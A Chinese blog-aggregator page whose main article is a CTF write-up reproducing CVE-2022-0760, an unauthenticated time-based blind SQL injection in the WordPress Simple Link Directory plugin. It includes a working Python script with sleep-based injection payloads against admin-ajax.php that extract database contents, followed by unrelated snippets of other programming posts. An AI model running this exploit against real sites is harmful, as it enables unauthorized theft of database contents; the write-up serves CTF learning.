当前位置：首页 > news >正文

CVE-2022-0760 漏洞复现

news 2026/5/19 9:31:50

CVE-2022-0760

NSS [HNCTF 2022 WEEK2]ohmywordpress

【CVE-2022-0760】

题目描述：flag在数据库里面。

开题：

顺着按钮一直点下去会发现出现一个按钮叫安装WordPress

安装完之后的界面，有一个搜索框。

F12看看network。

又出现了这个WordPress，从源码中看出版本是6.0.2。

网上一番搜索，找到一个cve，CVE-2022-0760。当WordPress的插件Simple Link Directory版本 < 7.7.2时候存在时间盲注。

查看源码，这里确实运用的这个插件，但是看不到版本。

估计就是这个CVE，那就直接上盲注脚本。

import requests
import timeurl = "http://node5.anna.nssctf.cn:28982/wp-admin/admin-ajax.php"result = ""
for i in range(1, 100):length = len(result)for o in range(32, 128):data = {"action": "qcopd_upvote_action",# "post_id": f"(SELECT 3 FROM (select if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))={o},sleep(3),0))enz)",# "post_id": f"(SELECT 3 FROM (select if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=substr((select group_concat(schema_name) from information_schema.schemata),26,11)),{i},1))={o},sleep(3),0))enz)","post_id": f"(SELECT 3 FROM (select if(ascii(substr((select group_concat(a) from (select 1 as a union select * from ctftraining.flag)b),{i},1))={o},sleep(3),0))enz)",}time1 = time.time()res = requests.post(url, data=data)time2 = time.time()# print(time2 - time1)# exit()if time2 - time1 > 3:result += chr(o)print(result)breakif len(result) == length:break

为什么这样写脚本，漏洞利用在下面文章里面能找到。

参考文章：

NSFOCUS绿盟科技

[Simple Link Directory < 7.7.2 - Unauthenticated SQL injection WordPress Security Vulnerability (wpscan.com)](

CVE-2022-0760 漏洞复现

CVE-2022-0760 NSS [HNCTF 2022 WEEK2]ohmywordpress 【CVE-2022-0760】题目描述：flag在数据库里面。开题： 顺着按钮一直点下去会发现出现一个按钮叫安装WordPress 安装完之后的界面，有一个搜索框。 F12看看network。又出现了这个Wor…...

编程日记 2024/2/12 1:25:13

WordPress突然后台无法管理问题

登录WordPress后台管理评论，发现点击编辑、回复均无反应。尝试清除缓存、关闭CF连接均无效。查看插件时发现关闭wp-china-yes插件可以解决问题。后来又测试了下发现加速管理后台这项，在启用时会发生点击无效问题，禁用就好了，不…...

编程日记 2024/2/12 1:23:11

STM32F1 - 标准外设库_规范

STM32F10x_StdPeriph_Lib_V3.6.0 1> 头文件包含关系2> .c文件内部结构3> 宏定义位置4> 位掩码bit mask5> .c文件中定义私有变量6> 枚举类型定义 1> 头文件包含关系 1个头文件stm32f10x.h 就把整个MCU以及标准外设库，就管理了； 2>…...

编程日记 2024/2/12 1:17:04

找到解压后的SysReg_xml_v86A-2019-12目录 wget https://developer.arm.com/-/media/developer/products/architecture/armv8-a-architecture/2019-12/SysReg_xml_v86A-2019-12.tar.gz wget https://developer.arm.com/-/media/developer/products/architecture/armv8-a-archi…...

编程日记 2024/2/12 1:09:59

LLMs之miqu-1-70b：miqu-1-70b的简介、安装和使用方法、案例应用之详细攻略

LLMs之miqu-1-70b：miqu-1-70b的简介、安装和使用方法、案例应用之详细攻略目录 miqu-1-70b的简介 miqu-1-70b的安装和使用方法 1、安装 2、使用方法 miqu-1-70b的案例应用 miqu-1-70b的简介 2024年1月28日，发布了miqu 70b，潜在系列中的…...

编程日记 2024/2/12 1:05:55

npm 下载报错

报错信息 : 证书过期 (CERT_HAS_EXPIRED) D:\Apps\nodejs-v18.16.1\npx.cmd --yes create-next-app"latest" . --ts npm ERR! code CERT_HAS_EXPIRED npm ERR! errno CERT_HAS_EXPIRED npm ERR! request to https://registry.npm.taobao.org/create-next-app failed…...

编程日记 2024/2/12 1:00:50

GPT-4登场：多模态能力革新，提升ChatGPT与必应体验，开放API助力游戏革新

GPT-4登场：多模态能力革新，提升ChatGPT与必应体验，开放API助力游戏革新引言在人工智能领域，GPT-4的发布标志着一个新时代的到来。这一多模态大模型不仅在技术性能上实现了飞跃，更在功能层面带来全新的突破。GPT-4的…...

编程日记 2024/2/12 0:56:46

【芯片设计- RTL 数字逻辑设计入门 11.1 -- 状态机实现移位运算与乘法 1】

文章目录移位运算与乘法状态机简介SystemVerilog中的测试平台VCS 波形仿真阻塞赋值和非阻塞赋值有限状态机（FSM）与无限状态机的区别本篇文章接着上篇文章【芯片设计- RTL 数字逻辑设计入门 11 – 移位运算与乘法】继续介绍，这里使用状态机…...

编程日记 2024/2/12 0:51:41

MongoDB系列：管道操作：聚合阶段操作符（二）

MongoDB系列：管道操作：聚合阶段操作符（二） 聚合阶段操作符介绍本节只编写了个人认为可能用到的操作符，详细更多的操作符以及使用注意事项请前往MongoDB官网。 $match 过滤匹配数据。 // 插入数据 db.orders.inse…...

编程日记 2024/2/12 0:48:36

C++ //练习 5.12 修改统计元音字母的程序，使其能统计以下含有两个字符的字符序列的数量：ff、fl和fi。

C Primer（第5版） 练习 5.12 练习 5.12 修改统计元音字母的程序，使其能统计以下含有两个字符的字符序列的数量：ff、fl和fi。环境：Linux Ubuntu（云服务器） 工具：vim 代码块 /****…...

编程日记 2024/2/12 0:47:35

C语言-----自定义类型-----结构体枚举联合

结构体和数组一样，都是一群数据的集合，不同的是数组当中的数据是相同的类型，但是结构体中的数据类型可以不相同，结构体里的成员叫做成员变量结构体类型是C语言里面的一种自定义类型，我们前面已经了解到过int,char,fl…...

编程日记 2024/2/12 0:46:34

elasticsearch下载及可视化工具下载使用

elasticsearch下载及配置、启动一、下载 Download Elasticsearch | Elastic 二、启动双击bat即可。出现如下说明启动成功： 访问测试： 三、注意 （1）因为es启动默认端口是：9200,所以需要检查此端口是否被占用。…...

编程日记 2024/2/12 0:43:30

vim常用命令以及配置文件

layout: article title: “vim文本编译器” vim文本编辑器有三种模式: 命令模式文本模式, 末行模式 vim命令大全 - 知乎 (zhihu.com) 命令模式插入 i: 切换到输入模式，在光标当前位置开始输入文本。 a: 进入插入模式，在光标下一个位置开始输入文…...

编程日记 2024/2/12 0:37:24

2024年的VUE2下的无效指令npm install --save vue-i18n

vue官网已经声明了不再维护vue2, vue-i18n安装依赖的时候就只接安装vue3的vue-i18, 直接报错： > npm install --save vue-i18n npm ERR! code ERESOLVE npm ERR! ERESOLVE unable to resolve dependency tree npm ERR! npm ERR! While resolving: yudao-ui-admin…...

编程日记 2024/2/12 0:33:21

计算机视觉主要知识点

计算机视觉是指利用计算机和算法来解析和理解图片和视频中的内容。这是一个跨学科领域，融合了计算机科学、图像处理、机器学习和模式识别等多方面的技术。以下是一些计算机视觉入门的基本知识点： 图像基础： 像素：图片的最基本组成…...

编程日记 2024/2/12 0:32:20

python 基础知识点（蓝桥杯python科目个人复习计划35）

今日复习计划：阶段总结（新年贺礼） 1.python简介（定义，优点，缺点，应用领域） python：一种广泛使用的解释型，高级和通用的编程语言 python极简，生…...

编程日记 2024/2/12 0:27:13

使用HTML、CSS和JavaScript来创建一个粒子效果，粒子会跟随鼠标点击位置生成

文章目录一、粒子效果二、JavaScript三、HTML四、CSS五、热门文章一、粒子效果以下是一个简单的示例，使用HTML、CSS和JavaScript来创建一个粒子效果，粒子会跟随鼠标点击位置生成： <!DOCTYPE html> <html> <head><t…...

编程日记 2024/2/12 0:23:09

优质项目追踪平台一览：助力项目管理与监控

项目追踪平台是现代项目管理中不可或缺的工具，它可以帮助团队高效地跟踪和管理项目进度、任务和资源分配。在当今快节奏的商业环境中，有许多热门的项目追踪平台可供选择。本文总结了当下热门的项目追踪平台，供您参考~ 1、Zoho Projects&…...

编程日记 2024/2/12 0:21:07

Docker下安装GitLab

极狐GitLab Docker 镜像 | 极狐GitLab 安装所需最小配置内存至少4G 系统内核至少3.10以上 uname -r 命令可以查看系统内核版本安装Docker 1.更新 yum源 yum update 2.安装依赖(如果在操作第三步的时候提示yum-config-manager 未找到命令就安装下面依赖) yum instal…...

编程日记 2024/2/12 0:18:04

2026年八大上门服务预约小程序：解锁高效生活新体验

本文围绕上门服务预约小程序展开系统性梳理，聚焦2026年市场上主流的八家服务商，包括好赞科技、厦门亿点通科技、福州启帆数字科技等。内容覆盖核心功能解析、场景适配性、用户体验及服务效率等关键维度，旨在帮助用户理解不同平台的差异化优势…...

编程新知 2026/5/19 6:41:47

Webpack优化实战：从配置到性能调优

Webpack优化实战：从配置到性能调优大家好，我是蔓蔓。在大厂工作时，我负责过多个大型项目的Webpack配置和优化。今天我来和大家分享Webpack优化的实战技巧。基础优化合理配置mode // webpack.config.js module.exports {mode: process.env…...

编程新知 2026/5/19 6:35:13